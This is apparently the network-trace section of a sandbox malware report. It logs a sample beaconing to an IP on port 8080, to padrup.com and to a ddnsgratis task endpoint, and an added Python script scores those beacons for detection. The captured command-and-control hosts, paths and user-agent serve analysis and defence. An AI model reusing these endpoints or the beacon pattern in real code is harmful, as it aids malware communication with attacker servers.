Cache-Control: no-cache
Oct 18, 2024 12:43:33.227518082 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DghzIUS0Yi83i93YoMeOXwnsEAPhmwsZv5V5nZYBXR8+7o+NH1PaSR/YbR08BYT4kY8rkEIrUc+eZUi65DGrIw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:43:33.227554083 CEST | 1236 | IN
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIxMi44ODc2OjY0ZWZmYmZiYzk1OGQwYWI0Y2VhNWE3N2Y2NWE5NzhhY2QyNWUwY2U4MDRkNmRkYzQwOWQ5YjhhYzQ6ee3MWIzMGY6NjcxMjNiZDRkOGI
Oct 18, 2024 12:43:33.227567911 CEST | 424 | IN
Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
Oct 18, 2024 12:43:33.227701902 CEST | 340 | IN
Data Ascii: 9087a303a6f6b4');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.9 | 49955 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:33.424642086 CEST | 171 | OUT | GET /sobakavolos.gif?17a69eba=-1120602672 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.9 | 49977 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:37.995996952 CEST | 156 | OUT | GET /sobaka1.gif?18285ae2=405297890 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:43:39.087029934 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_rriVJoTmCU7L1HNIdt7ucoQArVX9CcAiFVUqwO4lGu3FTFAU4pcP8ia06WA/XfWJwZhoGQ+Mx2s4NDo/zgB8Jw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087079048 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIxOC43MjgyOmM0MGJiOWJiYTI1ZjFlNGUwZGU2NDJlMTYwN2VkZWE2NWM1OTQzNzhiYThkOWQ5ODJi6f9NWM2NzM2OWJkZDlkMmI6NjcxMjNiZGFiMWN
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:39.087091923 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


Session ID: 42
Source IP: 192.168.2.9  Source Port: 49983  Destination IP: 190.120.227.91  Destination Port: 8080  PID: 800
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp / Bytes transferred / Direction / Data
[Oct 18, 2024 12:43:39.329504013 CEST] 171 bytes OUT
GET /sobakavolos.gif?1847fe9d=-1443367349 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID: 43
Source IP: 192.168.2.9  Source Port: 50001  Destination IP: 185.53.178.50  Destination Port: 80  PID: 800
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp / Bytes transferred / Direction / Data
[Oct 18, 2024 12:43:44.070574999 CEST] 157 bytes OUT
GET /sobaka1.gif?18b777d9=-977551672 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
[Oct 18, 2024 12:43:45.144809961 CEST] 1236 bytes IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SZOC0kRKOwaKL6XffhZpMA5kGAKLD05bTnIclwt8thBn3clrtqxxmvx/gNBQhp5DuHPpDPgmB0u2qeYns+NPmw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
[Oct 18, 2024 12:43:45.144839048 CEST] 224 bytes IN
Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIyNC43ODc5OjRjNDdkOGRjNDgwNjFlNmJmZDFkM2ZjMGJlMmJmZmIxNGYzOTAxMjI1NGM3ZWZkNGMxZWU3YmQyNjQxMzcxYjc6Njc
[Oct 18, 2024 12:43:45.144850969 CEST] 1236 bytes IN
Data Raw: 78 4d 6a 4e 69 5a 54 42 6a 4d 44 56 6a 4f 51 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
Data Ascii: xMjNiZTBjMDVjOQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
[Oct 18, 2024 12:43:45.144948006 CEST] 536 bytes IN
Data Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 65 31 26 74 6f 6b 65 6e 3d 27 20 2b 20 65
Data Ascii: } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123be1&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '2f73150b744e0cfaf755509b20c2b58acf9d0142f8b');</script><script type='text
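The four requests in sessions 42 to 45 share one shape: a GET for a sobaka*.gif path with a single 8-hex-digit query key carrying a signed integer (a cache buster), a fixed "MSIE 7.0b; Windows NT 6.0" User-Agent, Cache-Control: no-cache, and a Host that is either a raw IP with a non-standard port or the domain padrup.com. The padrup.com replies answer a .gif request with chunked text/html carrying X-Redirect: skenzo and X-Template headers, which is a domain-parking page rather than image data, so that endpoint is a historical indicator, not a live payload source. The script below is an added example, not part of the Joe Sandbox report or of any vendor tooling: it parses request and response heads constructed from the captures above and scores them against those traits. The trait list and the parking-header check are this editor's assumptions for illustration, not a published Sality signature.

```python
"""Triage of the HTTP beacons seen in the report's network trace.

Added example; not part of the Joe Sandbox report or of any vendor tooling.
The request/response texts at the bottom are constructed from the captures
shown on the page. The scoring heuristics are assumptions chosen to describe
that traffic, not a published Sality signature.
"""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Traits copied from the captured requests (assumed stable for illustration).
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
BEACON_PATH = re.compile(r"^/sobaka[a-z0-9]*\.gif$", re.IGNORECASE)
HEX_KEY = re.compile(r"^[0-9a-f]{8}$")
SIGNED_INT = re.compile(r"^-?\d+$")
RAW_IP_PORT = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d+$")
# Headers present on the padrup.com replies that mark a domain-parking page.
PARKING_HEADERS = ("x-redirect", "x-template", "x-adblock-key")


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)


def parse_message(raw: str) -> HttpMessage:
    """Split a raw HTTP head (start line plus headers) into a lookup table."""
    lines = [ln.rstrip("\r") for ln in raw.strip().splitlines() if ln.strip()]
    msg = HttpMessage(lines[0].strip())
    for line in lines[1:]:
        name, _, value = line.partition(":")
        msg.headers[name.strip().lower()] = value.strip()
    return msg


def beacon_reasons(req: HttpMessage) -> list:
    """Return the traits of `req` that match the beacon shape seen in the report."""
    reasons = []
    fields = req.start_line.split(" ")
    if len(fields) != 3 or fields[0] != "GET":
        return reasons
    url = urlsplit(fields[1])
    if BEACON_PATH.match(url.path):
        reasons.append("sobaka*.gif path")
    params = parse_qsl(url.query, keep_blank_values=True)
    if len(params) == 1 and HEX_KEY.match(params[0][0]) and SIGNED_INT.match(params[0][1]):
        reasons.append("single 8-hex-digit key with signed-int value (cache buster)")
    if req.headers.get("user-agent") == BEACON_UA:
        reasons.append("legacy MSIE 7.0b / NT 6.0 User-Agent")
    if req.headers.get("cache-control", "").lower() == "no-cache":
        reasons.append("Cache-Control: no-cache")
    if RAW_IP_PORT.match(req.headers.get("host", "")):
        reasons.append("raw IP host with explicit port")
    return reasons


def is_parked_reply(req: HttpMessage, resp: HttpMessage) -> bool:
    """True when a .gif request was answered with an HTML parking page."""
    wants_gif = req.start_line.split(" ")[1].split("?")[0].lower().endswith(".gif")
    html = resp.headers.get("content-type", "").lower().startswith("text/html")
    parked = any(h in resp.headers for h in PARKING_HEADERS)
    return wants_gif and html and parked


def triage(raw_req: str, raw_resp: Optional[str] = None) -> dict:
    """Score one request and, when a reply is given, flag a parked endpoint."""
    req = parse_message(raw_req)
    reasons = beacon_reasons(req)
    result = {"score": len(reasons), "reasons": reasons, "parked": None}
    if raw_resp is not None:
        result["parked"] = is_parked_reply(req, parse_message(raw_resp))
    return result


# Constructed from sessions 42 and 43 of the report (headers abridged).
REQ_IP = """GET /sobakavolos.gif?1847fe9d=-1443367349 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache
"""
REQ_DOMAIN = """GET /sobaka1.gif?18b777d9=-977551672 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
"""
RESP_DOMAIN = """HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
X-Redirect: skenzo
X-Template: tpl_CleanPeppermintBlack_twoclick
"""

if __name__ == "__main__":
    for label, req, resp in (("ip", REQ_IP, None), ("domain", REQ_DOMAIN, RESP_DOMAIN)):
        print(label, triage(req, resp))
```

The score is deliberately additive rather than a single regex so that an analyst can see which traits held: the raw-IP-with-port trait distinguishes the 190.120.227.91:8080 sessions from the padrup.com ones, and the parked flag separates "the sample still tries this URL" from "this URL still serves something".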


Session ID: 44
Source IP: 192.168.2.9  Source Port: 50007  Destination IP: 190.120.227.91  Destination Port: 8080  PID: 800
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp / Bytes transferred / Direction / Data
[Oct 18, 2024 12:43:45.472013950 CEST] 171 bytes OUT
GET /sobakavolos.gif?18d65779=-1378065329 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID: 45
Source IP: 192.168.2.9  Source Port: 50027  Destination IP: 185.53.178.50  Destination Port: 80  PID: 800
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp / Bytes transferred / Direction / Data
[Oct 18, 2024 12:43:50.095988989 CEST] 156 bytes OUT
GET /sobaka1.gif?195904b8=425264312 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
[Oct 18, 2024 12:43:51.117496967 CEST] 1236 bytes IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_PvSpXBwIEVEhXR5qHHt3lDi2zIss+NCDl6o9Qa87RL9GrJqznCi6Ar9lv+3MRgdQLK9oM6bKEnyEYNxZ3dVjAw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117522955 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIzMC43NzU0OjAwOGExMDFkODQxMDZhOWI3NGExODQwNmE4YWY2MGIzMjgzNDQwY2QxNWNhMDQzOThkZDc4N2YxNzY4OTZhODQ6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117535114 CEST1236INData Raw: 78 4d 6a 4e 69 5a 54 5a 69 5a 44 52 6d 4e 41 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNiZTZiZDRmNA==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:51.117548943 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 65 36 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123be6&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'f3f8ee064d94256efbe2f292968333eba146ba50dd1');</script><script type='


Session ID: 46
Source IP: 192.168.2.9
Source Port: 50028
Destination IP: 190.120.227.91
Destination Port: 8080
PID: 800
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp: Oct 18, 2024 12:43:51.487418890 CEST | Bytes transferred: 169 | Direction: OUT
Data:
GET /sobakavolos.gif?19856214=856343592 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID: 47
Source IP: 192.168.2.9
Source Port: 50029
Destination IP: 185.53.178.50
Destination Port: 80
PID: 800
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp: Oct 18, 2024 12:43:56.065637112 CEST | Bytes transferred: 158 | Direction: OUT
Data:
GET /sobaka1.gif?1a078ca7=-1238050671 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache

Timestamp: Oct 18, 2024 12:43:57.132951975 CEST | Bytes transferred: 1236 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_CA+jlT3JA93wYYmgWWw+oPOp5RD/H7ePVuBUV/cCq2FtMyGAwnXqRMclBGf2ZAoYJgftIUVxXJ2KR5lwkys5dA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Timestamp: Oct 18, 2024 12:43:57.132997990 CEST | Bytes transferred: 1236 | Direction: IN
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIzNi43NzkxOjEyN2ZjZDE0N2Y0MzViZjgwMmQ5NmE0ZmNlY2Y5MWUyYWExMGNhMDg3MTZmY2JhMjM3YjE0ODQxODczNmZkYTA6NjcxMjNiZWNiZTM3MA==';
Timestamp: Oct 18, 2024 12:43:57.133016109 CEST | Bytes transferred: 764 | Direction: IN
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID: 48
Source IP: 192.168.2.9
Source Port: 50030
Destination IP: 190.120.227.91
Destination Port: 8080
PID: 800
Process: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp: Oct 18, 2024 12:43:57.386337996 CEST | Bytes transferred: 170 | Direction: OUT
Data:
GET /sobakavolos.gif?253429ca=1872526686 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          49192.168.2.950031194.5.152.215807352C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:58.979418993 CEST | 453 | OUT | POST /n/tasks.php HTTP/1.0
    Host: n.ddnsgratis.com.br
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
    Content-type: application/x-www-form-urlencoded
    Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
    Content-length: 192
